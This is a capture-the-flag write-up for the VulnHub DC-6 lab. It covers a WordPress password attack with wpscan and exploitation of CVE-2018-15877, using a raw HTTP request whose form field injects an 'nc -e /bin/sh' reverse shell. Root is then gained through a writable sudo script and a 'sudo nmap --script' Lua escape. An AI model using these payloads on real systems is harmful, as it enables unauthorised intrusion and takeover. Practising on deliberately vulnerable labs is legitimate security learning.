Introduction

DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
This isn’t an overly difficult challenge so should be great for beginners.
The ultimate goal of this challenge is to get root and to read the one and only flag.

There is also a hint:

OK, this isn’t really a clue as such, but more of some “we don’t want to spend five years waiting for a certain process to finish” kind of advice for those who just want to get on with the job.
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
That should save you a few years. ;-)

Spoiler alert: the reason for this hint is that there is a password attack involved.

File. This file is only 619Mb, so that’s nice.

Nmap

We’ve got two ports only: SSH (22) and HTTP on 80. We have to add wordy to our /etc/hosts.

Wordpress

The wordy business probably gave it away, but if not it’s immediately obvious that this is a Wordpress site. We can run wpscan to find our users, and then do some gobusting. However, this doesn’t turn up anything interesting and neither does larger or different wordlists. I tried fuzzing for subdomains; nothing. Maybe it’s time to look at that hint.

XMLRPC

The site has xmlrpc enabled so it’s a password attack to move forward, after creating our password list as the hint suggested. The list of users came from our initial wpscan run.

root@kali:/opt/vulnhub/dc6# wpscan --usernames users.txt -P ./passwords.txt --url http://wordy

This gets us a password for user mark and we can log in to the web interface.

Wordpress

There isn’t much on Mark’s page, but he does have the Activity Monitor. Some googling turns up CVE-2018-15877. This leads us to this Burp Suite payload:

POST /wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools HTTP/1.1
Host: wordy
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools
Content-Type: multipart/form-data; boundary=---------------------------703056344735340322105459110
Content-Length: 322
Connection: close
Cookie: wordpress_14014489b649086e51cacb340bafe656=mark%7C1598871282%7C0hjUhcDMJXdd5OsrliCchWBpMuPyxc1pItAV7y5Z60Y%7Ce99f0681cd956b3de9bc0281b1163b8ce364740cb474c711236ba195e01e1cb6; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_14014489b649086e51cacb340bafe656=mark%7C1598871282%7C0hjUhcDMJXdd5OsrliCchWBpMuPyxc1pItAV7y5Z60Y%7Cf3869ccce7d4d4a7fa2576d971de1f5075230a4966084ee8ae2370a30d415001; wp-settings-time-3=1598699269
Upgrade-Insecure-Requests: 1

-----------------------------703056344735340322105459110
Content-Disposition: form-data; name="ip"

google.fr|nc -e /bin/sh 192.168.1.77 1234;
-----------------------------703056344735340322105459110
Content-Disposition: form-data; name="lookup"

Lookup
-----------------------------703056344735340322105459110--

And that is how we get our reverse shell. I did have to try a few different payloads before I found one that worked. Also I notice Google are now putting scary warnings on the pentestmonkey site.

www-data

We’re in as www-data but with some snooping around we find a file in Mark’s home directory providing a password for Graham, so we can su to Graham. Once we’ve done that we find we this:

graham@dc-6:/home/jens$ sudo -l
sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

So that’s interesting but all the script does is this:

#!/bin/bash
tar -czf backups.tar.gz /var/www/html

Initially I thought this was one of those tar wildcard things, but I couldn’t get it to work. But sometimes we can overthink things; in fact we just need to append a line to the script:

graham@dc-6:/home/jens$ echo '/bin/bash' >> backups.sh

Now when we run it we get a shell as jens. What can jens do? Let’s see:

jens@dc-6:~$ sudo -l
sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap
jens@dc-6:~$ TF=$(mktemp)
TF=$(mktemp)
jens@dc-6:~$ echo 'os.execute("/bin/sh")' > $TF
echo 'os.execute("/bin/sh")' > $TF
jens@dc-6:~$ sudo nmap --script=$TF
sudo nmap --script=$TF

Starting Nmap 7.40 ( https://nmap.org ) at 2020-08-29 22:19 AEST
NSE: Warning: Loading '/tmp/tmp.oqKcB9NgCc' -- the recommended file extension is '.nse'.
# whoami
root

Thanks once again to GTFOBins for the privesc.